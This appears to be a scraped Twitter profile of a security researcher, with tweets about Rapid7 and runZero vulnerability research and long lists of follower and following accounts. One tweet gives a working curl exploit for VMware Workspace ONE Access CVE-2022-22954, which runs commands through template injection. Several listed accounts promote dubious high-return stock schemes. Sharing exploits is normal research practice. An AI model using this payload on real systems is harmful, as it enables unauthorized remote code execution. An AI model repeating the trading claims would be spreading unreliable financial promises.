Matthew Kienow @HacksForProfit
hacks for fun and profit / software engineer / security researcher PGP: 9DCD 23A2 0181 B684 C21C 0ED2 9903 D880 6069 F788 keybase.io/inokii Joined August 2014-
Tweets794
-
Followers470
-
Following541
-
Likes407
🎥 Missed runZero Hour live? Catch it on demand! We recap Hacker Summer Camp highlights: ✅ @hdmoore on SSH vulns + SSHamble updates ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ OT protocol insights from Rob King 👉 runzero.com/resources/runz…
🎙 Hacker Summer Camp recap drops today on runZero Hour! ✅ @hdmoore on SSH vulns + SSHamble ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ Rob King on OT detection across protocol gateways. 📅 Aug 20 | 10AM PT 🔗 runzero.com/research/runze…
🗣️ Happening today at Black Hat Arsenal! Join @HacksForProfit & @Percent_X at 11am PDT for a live demo of Akheron Proxy, a tool for bridging, capturing, replaying, and manipulating UART inter-chip communications. 📍 Business Hall, Arsenal Station 9 🔗 runzero.com/black-hat-arse…
I'm excited to announce our "Out-of-Band" series; focused on the security risks of management devices like BMCs, serial servers, and KVMs. "Out-of-Band, Part 1: The new generation of IP KVMs and how to find them" is now live at: runzero.com/blog/oob-p1-ip…
A PSA for why you should probably not use Postman (it can leak secrets to them): anonymousdata.medium.com/postman-is-log…
I spoke with @robertvamosi on ErrodCode podcast awhile back on "Hacking Cellular-Enabled IoT Devices" We had a fun conversation. The podcast was just published so please check it out - errorcode.podbean.com/e/ep-52-hackin…
We have just published our AttackerKB @rapid7 Analysis for CVE-2024-47575, the recent FortiManager 0day, aka FortiJump 🔥 Read our full technical analysis; detailing firmware decryption, protocol analysis, and unauthenticated RCE 🚀 attackerkb.com/topics/OFBGprm…
CVE and vendor advisory now available on the #FortiManager 0day that's been knocking around the rumor mill (and evidently some Fortinet customers' email inboxes) for a while. Mitigate immediately, but IOCs need investigating, too. rapid7.com/blog/post/2024…
Rapid7's 2024 Attack Intelligence Report was released today and includes insights from 14 months of vulnerability and exploit analysis, thousands of ransomware incidents, 180+ APT campaigns, and a year+ of Rapid7 incident response findings. rapid7.com/research/repor…
I see "Not all vulnerabilities are created equal" pop up a lot these days in marketing materials for various security companies. We may not have truly been the first to coin that phrase, but AttackerKB's been using it since early 2020! attackerkb.com/about
Full @rapid7 analysis of PAN-OS CVE-2024-3400 now available from @stephenfewer and our stellar new research teammate @ChairNectar! Spoiler: It's a two-vuln exploit chain. attackerkb.com/topics/SSTk336…
Excellent technical analysis
Ahoy! I'm looking for an attack + vulnerability research leader to join @iagox86 and @stephenfewer in driving 0day + n-day research, identifying/developing new attack techniques, and helping set overall research strategy. U.S. ET time zone, job description coming soon. DMs open!
Advisory for a number of document management system (DMS) vulnerabilities I discovered. #XSS rapid7.com/blog/post/2023…
Today is the day! The Metasploit pivoting walkthrough challenge is live on tryhackme.com/christmas. It's free to sign up!
Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
Rapid7's vulnerability intelligence report is out today and features analysis from folks like @Junior_Baines, @zeroSteiner, @tychos_moose and a bunch of the @metasploit team. We tracked hundreds of data points across 50 high-impact vulns. Key points: (1/n) rapid7.com/info/2021-vuln…

Rapid7 @rapid7
123K Followers 3K Following Cybersecurity pros: Rapid7 lets you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from “inevitable” to preventable.
Whitney Champion 🍪... @shortxstack
30K Followers 11K Following security architect / cofounder @Recon_InfoSec / cofounder @DDI_training / ♥️♥♥ == @eric_capuano, nerdery, rainbows, sweatpants | she/her 🤍🌿🍄🌈🫶
Metasploit Project @metasploit
253K Followers 185 Following Official account of the Metasploit Project, part of the @rapid7 family. Mastodon: @[email protected] Slack: https://t.co/ZOLPDG2O2s
Charles Shirer @bsdbandit
25K Followers 26K Following A Hacker who is A Lover of People, and Life @RetroTwinz @Secbsd, @GrumpyHackers, @NovaHackers, @deadpixelsec @hacknotcrime Advocate @PositivelyBlue_ OSCP, OSWP
Caitlin Condon @catc0n
3K Followers 3K Following Adventurer. Takes a lot of photos, calls many places home. VP of research @VulnCheck. Former research director at @Rapid7 / @metasploit. Opinions mine. She/her.
DeborahKitto @1BojX3c78TphJ
1 Followers 287 Following
Diauqea @Diauqea887
0 Followers 79 Following
Omiequ @Omiequ8518
22 Followers 695 Following
AuroraAndrew @k3crJ7efxoSk3
0 Followers 84 Following
Fleajoo @Fleajoo7415061
39 Followers 1K Following
DayTradeAlerts🇺�... @Yguupvu47238
57 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Mary Butler @6tAJyKW10086aZO
0 Followers 148 Following 30%+ per month potential | 2 focused US names. Join free for disciplined trade strategies. @nahuel321rojas
David @DavidG_IV
0 Followers 35 Following
Awbeacirr @Awbeacirr64525
37 Followers 2K Following
ROIC_KING🇺🇸 @Peailkau193
39 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Lucile Barton-Douglas @barton99006
40 Followers 3K Following
Amanda Lindgren @LindgrenAm51888
28 Followers 2K Following
bashar @BashaarIltaadi
35 Followers 620 Following
yeshuibo @yeshuibo
106 Followers 6K Following
Dan Iskandarov @0xOnit3ngu
109 Followers 4K Following
Sushant Patil @Ekoscor
1 Followers 131 Following
Matt Boyle @MattJamesBoyle
14K Followers 3K Following Head of Product Engineering @ona_hq. @golang fan boy.
Ulrich Dangel @mr_ud
157 Followers 282 Following
Andy - @G33KatWork@in... @G33KatWork
4K Followers 665 Following I more or less left Twitter. The Musk is too musky.
Alex Read @trickyflipperft
13 Followers 54 Following
Curt Fielding @_CField
294 Followers 795 Following Vulnerability research/exploit dev. Search and Rescue. Mountain runner, skier, climber.
just Red @RedingtonJ35297
11 Followers 146 Following
Edentenzainpublic @Edinpublic
58 Followers 1K Following @edentenza agora também em versão pública no twitter. Podemos de repente dizer que é uma versão 2.0 do mesmo? talvez ,e agora tb muito + :, uncensored e spice !
Action Jackson @FreeMarketRally
87 Followers 285 Following
Raj Samani @Raj_Samani
14K Followers 606 Following Chief Scientist @Rapid7 | @cloudsa | Co-author of @CyberGridBook & CSA Guide to Cloud | Advisor @EC3Europol https://t.co/YpisLrWlVR
Tayseer Sweiti @TayseerSweiti
20 Followers 2K Following
n0hats @n0hats
130 Followers 292 Following Finding vulnerabilities | Learning new tricks thanks to #hackthebox | Always trying to figure out how to improve the status quo
void *huxley @huxley_barbee
283 Followers 2K Following Mastodon: @[email protected] Lead organizer for BSidesNYC
Loxcy @0xLoxcy
3 Followers 59 Following
Security Universal @SecurityUniver1
369 Followers 4K Following IT Security Platform with 24 Dedicated Security Services with a focus on Discovery, Auditing, Monitoring, Response, and Prevention.
danq @danquach_
26 Followers 2K Following
Heyder Andrade @HeyderAndrade
207 Followers 646 Following Skeptical Hacker. Messing around with security as a profession.
hackocracy69 @hackocracy69
175 Followers 2K Following
nomelitas @nomelitas
5 Followers 124 Following
Patrick Kiley @gigstorm
112 Followers 194 Following Principal Security Consultant “Opinions are my own and not the views of my employer”
H4CK3R @Oxford_ukwuta
139 Followers 2K Following Ethical hacker|cyber security enthusiast| Python programmer | full time breaker of things, part time maker
Gisela Hinojosa @gizzyrlz
15 Followers 168 Following
vmkernel @vmkernel
3 Followers 379 Following
Nancy @Nancy37952310
26 Followers 324 Following
AttackerKB @AttackerKb
918 Followers 15 Following Community-driven information, analysis, and discussion of vulnerabilities and threats. Part of the @Rapid7 family.
nixCraft 🐧 @nixcraft
386K Followers 622 Following Love Linux/Unix, open source, and programming? Into Sysadmin & DevOps? Follow us! Boost your IT career with daily new tools, apps, and humor ⤵️
vx-underground @vxunderground
368K Followers 290 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected
Mick Douglas 🇺🇦... @bettersafetynet
30K Followers 568 Following Consultant for InfoSec Innovations | @SANSInstitute Principal Instructor | @IANS_Security Faculty | I like information security. How about you?
Florian Roth ⚡️ @cyb3rops
206K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
Curt @CurtBarnard
447 Followers 499 Following Sometimes I talk about computers. https://t.co/lQqeEELwk9
Dave Kennedy @HackingDave
223K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Pod. God + Family/Hacker/CSO/USMC/Intel/Fitness. Make the world a better place.
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
gabsmashh @gabsmashh
107K Followers 3K Following security strategist | 2L JD Candidate | NYU alum | UMGC adjunct professor | USMC & USCG auxiliarist
Robert Graham @ErrataRob
66K Followers 2K Following Created (BlackICE,IPS,sidejacking,masscan). Doing (blog,code,cyber-rights,Internet-scanning). Macrodata refiner.
Will Dormann is on Ma... @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. I used to be here on Twitter but now I'm here: @[email protected] https://t.co/hXggdAVkSQ
Rapid7 @rapid7
123K Followers 3K Following Cybersecurity pros: Rapid7 lets you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from “inevitable” to preventable.
🥝🏳️🌈 Be... @gentilkiwi
62K Followers 286 Following A kiwi coding mimikatz & kekeo github: https://t.co/eS3LVgU6i0 Head of security services @banquedefrance Tweets are my own and not the views of my employer
Whitney Champion 🍪... @shortxstack
30K Followers 11K Following security architect / cofounder @Recon_InfoSec / cofounder @DDI_training / ♥️♥♥ == @eric_capuano, nerdery, rainbows, sweatpants | she/her 🤍🌿🍄🌈🫶
scriptjunkie (Matt) @scriptjunkie1
7K Followers 1K Following Documentation is lies. Source is an abstraction. Assembly is the truth. Also at https://t.co/VYFZ0HHnQn and nostr npub10mx0gx3r2lszrrut8kvr5mt2m8r9ffhn
hackerfantastic.x @hackerfantastic
104K Followers 5K Following Co-Founder @myhackerhouse & https://t.co/ouNFRET3hI. Cybersecurity & blockchain expert. Author of Hands-on Hacking (ISBN 9781119561453). Offensive Lua. #Web3
Stephen Fewer @stephenfewer
9K Followers 245 Following Senior Principal Security Researcher @rapid7. Decompiler @relyze. Core @metasploit dev 2009 - 2013. MSRC Top 100 2015. Pwn2Own 2011, 2021, 2024.
Metasploit Project @metasploit
253K Followers 185 Following Official account of the Metasploit Project, part of the @rapid7 family. Mastodon: @[email protected] Slack: https://t.co/ZOLPDG2O2s
x0rz @x0rz
96K Followers 420 Following Cybersecurity & Threat Intelligence. Knowledge is power, France is bacon 🥓
Charles Shirer @bsdbandit
25K Followers 26K Following A Hacker who is A Lover of People, and Life @RetroTwinz @Secbsd, @GrumpyHackers, @NovaHackers, @deadpixelsec @hacknotcrime Advocate @PositivelyBlue_ OSCP, OSWP
David Maynor @Dave_Maynor
14K Followers 6K Following No tree, it is said, can grow to heaven, unless it’s roots reach down to hell. Offensive Security, AI LLM Ops, hardware hacking
zerohedge @zerohedge
2.2M Followers 912 Following
Bravos Research @bravosresearch
298K Followers 635 Following Data-driven Investment Research | Follow to learn about markets & the global economy | Get swing trade ideas & market analysis at https://t.co/Jjyd8HqJL4
Saty @satymahajan
57K Followers 0 Following Options trader. Engineer. Gamer. ATR Levels, Pivot Ribbon, Phase Oscillator, and Volume Stack creator. Everything I offer is here: https://t.co/rXzyzG2lwv
TSDR Trading @TSDR_Trading
46K Followers 1K Following TELL. SHOW. DO. REVIEW. Trader from MN. 4 young kids. Live Trading all day, every day. --This is how you win--
manrav @manrav
3K Followers 199 Following | Student of the Market 📝| | Price Action 📈📉 | Chart Patterns 📊 | Options Flow 💰 |
Roaring Kitty @TheRoaringKitty
1.7M Followers 90 Following
Jim Carroll @vixologist
29K Followers 5K Following Portfolio manager specializing in momentum and volatility strategies. Also hack guitar player who sings. Tweets and RTs are not investment advice.
James Boyd @JamesBoydCS
20K Followers 1K Following Education Coach. @SchwabNetwork Contributor. Married, father of 4. Tennis & College 🏈 fan. BBQ lover. Important Disclosures: https://t.co/R8S2cUmT2V
The Kobeissi Letter @KobeissiLetter
990K Followers 569 Following Official X account for The Kobeissi Letter, an industry leading commentary on the global capital markets. Email us: [email protected]
Seven @SevenParr
9K Followers 412 Following Exploiting inefficiencies in the financial markets. Posts are opinions and not financial advice.
Proton Mail @ProtonMail
67K Followers 28 Following The world's largest secure & private email provider. Swiss-based, end-to-end encrypted, and free. Brought to you by the scientists behind @ProtonPrivacy.
Wolf of My Street🏡 @Ryan__Rigg
73K Followers 473 Following Family First | Data & Market Enthusiast | 2x CS Grad @Uofillinois | Retail Investor & Educator | Tech & AI | Options Flow Hunting @unusual_whales
Adrian Cantrill @adriancantrill
23K Followers 358 Following #bitcoin Posting mainly on nostr https://t.co/JqYnpHcfCs (privacy focused and censorship resistant) AWS Technical Trainer @ https://t.co/eR6AY24r8U
SpaceX @SpaceX
39.9M Followers 120 Following SpaceX designs, manufactures and launches the world’s most advanced rockets and spacecraft
RET2 Systems @ret2systems
12K Followers 1 Following We strive to reimagine vulnerability research, program analysis, and security education as it exists today. An @RPISEC corporation.
Trifecta Rick @twitwitrk
2K Followers 638 Following Father, Husband, and Chartist. Volume watcher/reversal spotter. All posts are my observation not investment advice. I learn so I evolve @USCMarshall Alum✌️
Kyla Scanlon @kylascan
194K Followers 974 Following Author of "In This Economy?” | [email protected]
Dmitry Grinberg @dmitrygr
5K Followers 102 Following Creating order out of chaos, or reverse (as needed).
unusualwhales.com Sno... @snorlax_uw
109K Followers 238 Following Options Flow by https://t.co/CoBM8tcNWc (code snor14x 14% off) Email support@unusualwhales for account help Not financial advice / Flow is time sensitive
Quant Data @QuantData
41K Followers 73 Following Bridging the gap between institutions & retail traders since August, 2020. Our tweets are for informational purposes only.
Anthony Sandford @AnthonySandford
30K Followers 144 Following Flow Is Time Sensitive | @Unusual_Whales Partner 🐳 | Stock Hub Discord Access ➡️ https://t.co/3YDeZCqku7 | Not Financial Advice
SentimenTrader @sentimentrader
261K Followers 652 Following The Sentimentrader Advantage: Over 20 years of exclusive, data-driven insights and unrivaled market sentiment tools.
A.P @Limitlesss1
9K Followers 968 Following Jesus| 🇬🇭 | 🇺🇸 | $SPY Options Enthusiast| Gamma Guy| Not Financial Advice| Profitable Options | Learn with me: https://t.co/65pq7n2fGI
Álvaro Prieto @alvaroprieto
4K Followers 605 Following Electrical/Firmware Engineer, maker, traveler. @unnamed_show co-host. https://t.co/E8DRB4f3uB
Matt Boyle @MattJamesBoyle
14K Followers 3K Following Head of Product Engineering @ona_hq. @golang fan boy.
POC_Crew 👨👩�... @POC_Crew
7K Followers 677 Following Organizer of Zer0Con, MOSEC and #POC2025 (https://t.co/LP1W4KC4vY)
kitze @thekitze
73K Followers 625 Following ex - quit to bootstrap https://t.co/OTHKhGcWrU to 100K MRR https://t.co/BaMlf8oBGj → speed up ur webdev game https://t.co/EpRflP3CGs → SHIP!!!
Christoph Nakazawa @cpojer
28K Followers 126 Following ceo at https://t.co/yePM4nWXOi built Athena Crisis, jest, metro, yarn and mootools
Pedram Amini @pedramamini
7K Followers 855 Following Repeat founder, investor, hacker. Chief Scientist @OPSWAT. Advisor @ExodusIntel & @0dinai, Previously created @theZDI and OpenRCE. NYC born, Austin transplant.
Тsфdiиg @tsoding
92K Followers 278 Following Recreational Programming - https://t.co/cPjxUvz266 - https://t.co/EilSXwJsXC - https://t.co/0cNzC7z24Y ⠀⢀⣰⣾⡿⣶⣿⠿⣶ ⢠⣼⣿⣿⣷⣿⣿⣶⠉ ⢸⣿⣿⣿⣿⣿⣿⠀⠀
Ulrich Dangel @mr_ud
157 Followers 282 Following
MISP (@misp@misp-comm... @MISPProject
23K Followers 95 Following MISP - Threat Sharing. An open source software and standards to share, create and validate threatintel and intelligence. Mastodon @[email protected]
AIL Project @ail_project
914 Followers 24 Following AIL Project is an open source project to collect and analyse data to produce security intelligence.
Curt Fielding @_CField
294 Followers 795 Following Vulnerability research/exploit dev. Search and Rescue. Mountain runner, skier, climber.
Christiaan Beek @ChristiaanBeek
10K Followers 2K Following Saved by His Grace • sr dir Threat Analytics @Rapid7 - opinions are my own• Speaker•Former @Foundstone @Intel @Kon_Marine https://t.co/2MSYGTBKuq
Kim Dotcom @KimDotcom
1.7M Followers 19K Following Entrepreneur, Innovator, Gamer, Artist, Internet Freedom Fighter & Father of 6
Cody Thomas @its_a_feature_
7K Followers 310 Following Mythic Developer (https://t.co/Uz4fOxIUbe) | @SpecterOps @[email protected] | @its-a-feature.bsky.social